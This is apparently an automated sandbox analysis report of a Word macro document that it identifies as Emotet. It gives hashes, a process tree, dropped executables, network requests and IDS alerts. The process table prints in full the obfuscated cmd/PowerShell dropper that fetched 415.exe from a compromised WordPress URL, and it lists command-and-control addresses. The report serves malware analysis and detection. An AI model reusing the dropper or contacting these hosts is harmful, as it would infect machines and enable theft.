download: | Smallbusiness |
Full analysis: | https://app.any.run/tasks/d9cad3b8-a568-4d3b-bb15-0057319c6a2f |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 14, 2018, 07:58:23 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Nathaniel-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Nov 9 18:52:00 2018, Last Saved Time/Date: Fri Nov 9 18:52:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | 2AA37EA93DBD8579EA712ED2C23BD78F |
SHA1: | 1FED13206CC113F893E06F26F6E914E35BD092A9 |
SHA256: | 65E4C3C3407F22722AEB6B0E477027E01AA381D83209F713B48F8B4F738528F9 |
SSDEEP: | 768:gI6NVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9RCkrXUomQwEHcwRd:gFNocn1kp59gxBK85fBt+a9dXUDd |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 14 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 13 |
Words: | 2 |
Pages: | 1 |
ModifyDate: | 2018:11:09 18:52:00 |
CreateDate: | 2018:11:09 18:52:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Nathaniel-PC |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3556 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Smallbusiness.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2312 | CMD C:\windowS\sYsTeM32\cmd /C "SEt dlV=(("{93}{86}{31}{95}{45}{77}{35}{43}{58}{30}{28}{74}{68}{42}{26}{70}{57}{23}{78}{34}{32}{17}{129}{52}{116}{71}{73}{16}{99}{127}{115}{6}{137}{134}{108}{83}{88}{106}{90}{19}{29}{96}{66}{110}{11}{51}{38}{25}{10}{107}{111}{56}{105}{67}{97}{109}{113}{33}{128}{130}{69}{133}{55}{48}{91}{72}{102}{101}{104}{112}{61}{9}{49}{124}{89}{39}{123}{46}{15}{76}{18}{44}{121}{20}{3}{79}{75}{8}{7}{92}{126}{117}{22}{120}{119}{135}{84}{87}{50}{65}{82}{53}{81}{136}{54}{37}{122}{132}{41}{2}{27}{14}{60}{24}{62}{114}{100}{59}{85}{131}{63}{0}{21}{13}{103}{118}{98}{5}{64}{94}{36}{47}{125}{40}{12}{4}{80}{1}" -f'D()3rZ',')','b','JK','N6qs','NVe','vPyv','6','g5Ko','PSF','HaCX','OY','s-JoI','( ','E','n7c','ON','Si8C','ZL','ZQvjca','wlQUtncGsi',' .','s','NG(','t','vB','mbaSE64','j','MoRY','L','iO.mE','ompre','wFIb/','/9','Bda8I','rEA','FEREnce','rZF','1jUatjsw7Pp','e','x6q','w-O','veRt]::fRo','M(','3','EFLa','l7Q/11I/A',')[','nyhD','f5','resS','gzz7eIW1LZ','DDYHhoL7','reSsiOnMODe','OmpReSs)3','k','eW2S+','TRI',' [','nCodinG]::AS','c','qd8yBV',' sYSTeM.io.streaM','aDtoeN','rbOsEpR','iO','YMp5ZyWCitO','cqQvd','M][coN','m9AF','s','FMuZABrtJ','NB9m','0y','StREA','Ro8R','ME2Tl','tESt','6qsNZ','rxtR','6qs',']::DE','n.COMP','yDwm','o.','Cii','O.C','cOmP','QN','ibTL','L','49Pl','ssw/AM=6qs',' ( nEw-ObjEct i','E','sSIoN.d','Apiep/TGrGdcx5C','1CZnu20Geu6','BU','qUmJp41T','AdER( BUN_,[Text.e','HQTu','WfE7D9HO','([S','k','4+fT+u1zdWcHd1Qu9NGP','y','yr','UbiFkrt','Sjd','BlZ6HNlP','R','vnY58ShmcgI','d3XkmFdMV','rE','4dz','QOi',',[sy','TRiNG]','em.','t','cA185CM','orE','m','32','1,3]+6qs',')','+t+Xit','4s','sbgm','VzvKNm0s',')} ).Re','ACh { nE','TQUpg','Xn9','I','C','JxD')).rePlace('BUN',[sTRing][cHAr]36).rePlace(([cHAr]54+[cHAr]113+[cHAr]115),[sTRing][cHAr]39).rePlace(([cHAr]51+[cHAr]114+[cHAr]90),[sTRing][cHAr]124)^| . ( $PSHOME[4]+$pshOme[30]+'x')&& POWerSHelL ${eXECUTIONCoNtEXT}.\"iNvo`k`eCOmM`AND\".( \"{1}{2}{0}\" -f'IpT','InV','OKeSCR').Invoke( (.( 'LS') ( \"{0}{1}\" -f 'eNV:','DLV' ) ).\"vA`lUe\" )" | C:\Windows\system32\CMD.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1404 | POWerSHelL ${eXECUTIONCoNtEXT}.\"iNvo`k`eCOmM`AND\".( \"{1}{2}{0}\" -f'IpT','InV','OKeSCR').Invoke( (.( 'LS') ( \"{0}{1}\" -f 'eNV:','DLV' ) ).\"vA`lUe\" ) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CMD.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2364 | "C:\Users\admin\AppData\Local\Temp\415.exe" | C:\Users\admin\AppData\Local\Temp\415.exe | — | powershell.exe |
User: admin Company: AbanSoft / Sun Microsystems, Inc. Integrity Level: MEDIUM Description: Window I Stub Exit code: 0 Version: 1, 4, 2, 50 | ||||
3328 | "C:\Users\admin\AppData\Local\Temp\415.exe" | C:\Users\admin\AppData\Local\Temp\415.exe | 415.exe | |
User: admin Company: AbanSoft / Sun Microsystems, Inc. Integrity Level: MEDIUM Description: Window I Stub Exit code: 0 Version: 1, 4, 2, 50 | ||||
568 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | 415.exe | |
User: admin Company: AbanSoft / Sun Microsystems, Inc. Integrity Level: MEDIUM Description: Window I Stub Exit code: 0 Version: 1, 4, 2, 50 | ||||
2520 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | lpiograd.exe | |
User: admin Company: AbanSoft / Sun Microsystems, Inc. Integrity Level: MEDIUM Description: Window I Stub Version: 1, 4, 2, 50 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3556 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR2F19.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1404 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H4QMNT5KHXH1NPLNYGUO.temp | — | |
MD5:— | SHA256:— | |||
3556 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D60D20A20527B37836471105C937C8C9 | SHA256:D732ED54E40AA23E1F5E768DA5969B8DA55C63266851B617B2E390CE2BF33573 | |||
3556 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$allbusiness.doc | pgc | |
MD5:CF4BDA2B68F90083FF663990A05E221D | SHA256:E70C4DA7761539B6BDECA1E6B9249001B56E0E4DFF7004597815B3EA2BA7E308 | |||
3328 | 415.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:E17B56AFBBF5C7D669DAF90CD32ED3FB | SHA256:6A5A61DADD6C32095CA3450ECE4524005929B0A33C4547E27112645274667364 | |||
1404 | powershell.exe | C:\Users\admin\AppData\Local\Temp\415.exe | executable | |
MD5:E17B56AFBBF5C7D669DAF90CD32ED3FB | SHA256:6A5A61DADD6C32095CA3450ECE4524005929B0A33C4547E27112645274667364 | |||
1404 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1837b5.TMP | binary | |
MD5:2E6C332796340AFFBFF5230455889D0D | SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E | |||
1404 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2E6C332796340AFFBFF5230455889D0D | SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2520 | lpiograd.exe | GET | — | 173.34.90.245:443 | http://173.34.90.245:443/ | CA | — | — | malicious |
1404 | powershell.exe | GET | 200 | 200.170.94.183:80 | http://www.coronatec.com.br/wp-content/W/ | BR | executable | 148 Kb | suspicious |
1404 | powershell.exe | GET | 301 | 200.170.94.183:80 | http://www.coronatec.com.br/wp-content/W | BR | html | 249 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2520 | lpiograd.exe | 173.34.90.245:443 | — | Rogers Cable Communications Inc. | CA | malicious |
1404 | powershell.exe | 200.170.94.183:80 | www.coronatec.com.br | Durand do Brasil Ltda | BR | suspicious |
Domain | IP | Reputation |
---|---|---|
www.coronatec.com.br |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
1404 | powershell.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
1404 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1404 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
1404 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |